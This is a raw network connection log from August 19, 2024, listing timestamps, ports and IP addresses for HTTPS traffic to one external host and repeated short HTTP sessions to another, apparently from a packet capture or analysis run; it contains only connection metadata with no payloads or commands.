Aug 19, 2024 06:06:14.793975115 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.794069052 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.794069052 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.794075966 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.794111013 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.799308062 CEST	49882	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:14.804487944 CEST	80	49882	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:14.804537058 CEST	49882	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:14.805759907 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.805773973 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.806065083 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.806075096 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.806178093 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.813071966 CEST	49883	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:14.818027973 CEST	80	49883	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:14.818098068 CEST	49883	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:14.819511890 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.819530964 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.819591999 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.819606066 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.819685936 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.821037054 CEST	49883	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:14.825825930 CEST	80	49883	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:14.833961964 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.833980083 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.834017992 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.834031105 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.834075928 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.834075928 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.844897985 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.844917059 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.844959021 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.844975948 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.845009089 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.845009089 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.853792906 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.853811026 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.853894949 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.853894949 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.853904009 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.853964090 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.863159895 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.863178968 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.863303900 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.863303900 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.863312960 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.863435030 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.870925903 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.870950937 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.870994091 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.871010065 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.871061087 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.871061087 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.878859043 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.878875971 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.878952980 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.878952980 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.878962994 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.878992081 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.888811111 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.888828993 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.888879061 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.888895035 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.888936996 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.888936996 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.902971983 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.903054953 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.903068066 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.903165102 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.903367996 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.903387070 CEST	443	49881	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:14.903395891 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:14.903439999 CEST	49881	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:15.188509941 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:15.188548088 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:15.188852072 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:15.189107895 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:15.189127922 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:15.566977978 CEST	80	49883	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:15.567157984 CEST	49883	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:15.571501017 CEST	49883	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:15.571501017 CEST	49885	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:15.576427937 CEST	80	49885	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:15.576616049 CEST	49885	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:15.577193022 CEST	80	49883	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:15.577347994 CEST	49883	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:15.577450037 CEST	49885	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:15.582221031 CEST	80	49885	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:15.860795021 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:15.861102104 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:15.861705065 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:15.861721992 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:15.864471912 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:15.864480019 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.294785976 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.294847965 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.294892073 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.294910908 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.294910908 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.294931889 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.294945955 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.294972897 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.295015097 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.318753004 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.318804026 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.318834066 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.318852901 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.318888903 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.318888903 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.330902100 CEST	80	49885	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:16.330976009 CEST	49885	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:16.387315035 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.387342930 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.387428045 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.387428045 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.387448072 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.387501955 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.413992882 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.414011955 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.414062977 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.414069891 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.414105892 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.414150953 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.448421955 CEST	49885	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:16.448935986 CEST	49886	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:16.452172995 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.452193022 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.452260971 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.452261925 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.452269077 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.452325106 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.453649998 CEST	80	49885	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:16.453696966 CEST	80	49886	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:16.453697920 CEST	49885	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:16.453752995 CEST	49886	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:16.453877926 CEST	49886	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:16.458642960 CEST	80	49886	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:16.476473093 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.476500988 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.476630926 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.476636887 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.476711988 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.476711988 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.495794058 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.495812893 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.495851994 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.495862961 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.495906115 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.495906115 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.513529062 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.513587952 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.513605118 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.513618946 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.513660908 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.513660908 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.531968117 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.532016993 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.532058001 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.532058001 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.532067060 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.532103062 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.532161951 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.545043945 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.545084000 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.545150995 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.545150995 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.545157909 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.545193911 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.564467907 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.564527988 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.564589977 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.564589977 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.564599037 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.564708948 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.576028109 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.576067924 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.576108932 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.576114893 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.576163054 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.576163054 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.586716890 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.586755037 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.586776018 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.586790085 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.586822987 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.586867094 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.595815897 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.595855951 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.595880985 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.595896006 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.595932961 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.595932961 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.605200052 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.605256081 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.605321884 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.605321884 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.605329037 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.605443001 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.611283064 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.611320019 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.611387968 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.611387968 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.611394882 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.611455917 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.611490011 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.611546993 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.611938000 CEST	49884	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.611959934 CEST	443	49884	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.952785015 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.952831030 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:16.952934980 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.953444004 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:16.953459024 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:17.193347931 CEST	80	49886	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:17.194681883 CEST	49886	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:17.197539091 CEST	49886	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:17.198771954 CEST	49888	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:17.202656984 CEST	80	49886	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:17.203907967 CEST	80	49888	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:17.204013109 CEST	49888	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:17.204020023 CEST	49886	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:17.204256058 CEST	49888	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:17.209089041 CEST	80	49888	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:17.621577024 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:17.621680021 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:17.622195005 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:17.622215986 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:17.623914957 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:17.623930931 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:17.957115889 CEST	80	49888	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:17.958781958 CEST	49888	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:18.061619997 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.061650038 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.061670065 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.061788082 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:18.061788082 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:18.061809063 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.062647104 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:18.072921038 CEST	49888	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:18.072921991 CEST	49889	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:18.078289986 CEST	80	49889	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:18.078659058 CEST	80	49888	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:18.078664064 CEST	49889	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:18.078872919 CEST	49888	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:18.078938961 CEST	49889	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:18.084275961 CEST	80	49889	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:18.093148947 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.093183041 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.093319893 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:18.093319893 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:18.093333006 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.094598055 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:18.161953926 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.162013054 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.162029028 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:18.162044048 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.162100077 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:18.193689108 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.193711996 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.193753958 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:18.193762064 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.193775892 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:18.193794012 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:18.228396893 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.228441954 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.228470087 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:18.228492975 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.228522062 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:18.228534937 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:18.228656054 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.228699923 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:18.228889942 CEST	49887	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:18.228914976 CEST	443	49887	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.621753931 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:18.621800900 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.621876001 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:18.622282028 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:18.622297049 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:18.846900940 CEST	80	49889	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:18.846971035 CEST	49889	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:18.851603031 CEST	49889	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:18.851970911 CEST	49891	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:18.856873035 CEST	80	49891	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:18.856890917 CEST	80	49889	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:18.856950045 CEST	49891	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:18.856965065 CEST	49889	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:18.857719898 CEST	49891	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:18.862489939 CEST	80	49891	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:19.276470900 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.279581070 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.281845093 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.281845093 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.281853914 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.281869888 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.638437986 CEST	80	49891	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:19.638987064 CEST	49891	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:19.708194017 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.708220005 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.708235979 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.708379030 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.708405018 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.708467007 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.738559008 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.738578081 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.738701105 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.738711119 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.739556074 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.744514942 CEST	49891	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:19.748471022 CEST	49892	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:19.749594927 CEST	80	49891	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:19.751586914 CEST	49891	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:19.753258944 CEST	80	49892	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:19.754602909 CEST	49892	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:19.760255098 CEST	49892	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:19.765017986 CEST	80	49892	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:19.805824995 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.805840969 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.806097984 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.806108952 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.807570934 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.836393118 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.836409092 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.836560965 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.836568117 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.836903095 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.875262976 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.875277996 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.875349045 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.875360966 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.875503063 CEST	49890	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:19.900113106 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.900127888 CEST	443	49890	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:19.900288105 CEST	49890	443	192.168.2.4	195.201.118.191
